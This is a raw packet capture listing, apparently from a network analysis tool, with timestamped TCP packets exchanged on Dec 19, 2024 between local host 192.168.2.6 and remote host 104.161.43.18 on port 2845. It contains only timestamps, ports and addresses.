                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.943141937 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.943242073 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.944066048 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.944231033 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.944295883 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.944360018 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.945244074 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.945369005 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.945440054 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.946326017 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.946433067 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.946512938 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.947348118 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.947458029 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.947681904 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.948385000 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.948497057 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.949450970 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.949579954 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.949609995 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.949944019 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.950515032 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.950628996 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.950690985 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.951545954 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.951661110 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.951728106 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.952574968 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.952683926 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.952819109 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.953640938 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.953814983 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.953993082 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.954691887 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.954775095 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.954844952 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.955754995 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.955851078 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.956024885 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.956832886 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.956847906 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.957225084 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.957881927 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.957971096 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.958082914 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.958892107 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.959024906 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.959918022 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.960052967 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.960201025 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.960488081 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:14.960896015 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.008683920 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.098337889 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.098449945 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.098608971 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.098889112 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.098988056 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.099288940 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.100331068 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.100423098 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.100948095 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.100991011 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.101005077 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.101165056 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.101978064 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.102001905 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.103034973 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.103071928 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.103142977 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.103795052 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.104207039 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.104367971 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.105047941 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.105159998 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.105201960 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.106230974 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.106367111 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.106398106 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.106962919 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.107326031 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.107351065 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.107733011 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.108242989 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.108345032 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.108520031 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.109258890 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.109419107 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.110296011 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.110358953 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.110447884 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.111530066 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.111545086 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.111579895 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.112412930 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.112448931 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.112489939 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.113428116 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.113456964 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.113514900 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.113635063 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.114542961 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.114625931 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.114717007 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.115544081 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.115709066 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.116591930 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.116601944 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.116668940 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.117724895 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.117738008 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.117820024 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.118680000 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.118711948 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.118804932 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.119695902 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.119740009 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.119838953 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.119942904 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.120788097 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.120904922 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.121462107 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.121845007 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.121927977 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.122090101 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.122908115 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.122967958 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.123290062 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.123910904 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.123965979 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.124481916 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.124994993 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.125098944 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.125457048 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.126028061 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.126118898 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.127077103 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.127173901 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.127260923 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.128160000 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.128185987 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.128408909 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.129179955 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.129307032 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.129362106 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.130275011 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.130359888 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.130543947 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.131616116 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.131797075 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.131997108 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.133147955 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.133217096 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.133292913 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.133997917 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.134069920 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.134154081 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.134901047 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.135015965 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.135334015 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.135798931 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.135941029 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.136147022 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.136782885 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.136897087 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.137636900 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.137700081 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.137732983 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.138180017 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.138614893 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.138786077 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.138978958 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.139727116 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.139826059 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.139893055 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.140744925 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.140860081 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.141293049 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.141856909 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.141963959 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.142714977 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.142798901 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.142863989 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.143008947 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.143855095 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.143969059 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.144957066 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.145010948 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.145642996 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.146212101 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.146334887 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.146493912 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.147043943 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.147068977 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.147152901 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.148071051 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.148150921 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.148596048 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.149102926 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.149223089 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.149307013 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.150161982 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.150327921 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.150414944 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.151180029 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.151324034 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.152327061 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.152434111 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.152456045 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.152586937 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.153341055 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.196163893 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.290613890 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.290640116 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.290812016 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.291176081 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.291273117 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.291495085 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.292182922 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.292300940 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.292788982 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.293346882 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.293363094 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.293456078 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.294292927 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.294406891 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.294586897 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.295346975 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.295523882 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.295953035 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.296370029 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.296509981 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.296590090 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.297565937 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.297719955 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.297791004 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.298577070 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.298779011 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.298849106 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.299707890 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.299781084 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.299890995 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.300890923 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.301063061 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.301963091 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.302050114 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.302067995 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.302180052 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.302800894 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.302871943 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.303332090 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.303774118 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.303961039 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.304091930 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.304788113 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.304898977 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.305073023 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.305818081 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.305912018 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.306530952 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.306982994 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.307066917 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.307632923 CET499312845192.168.2.6104.161.43.18
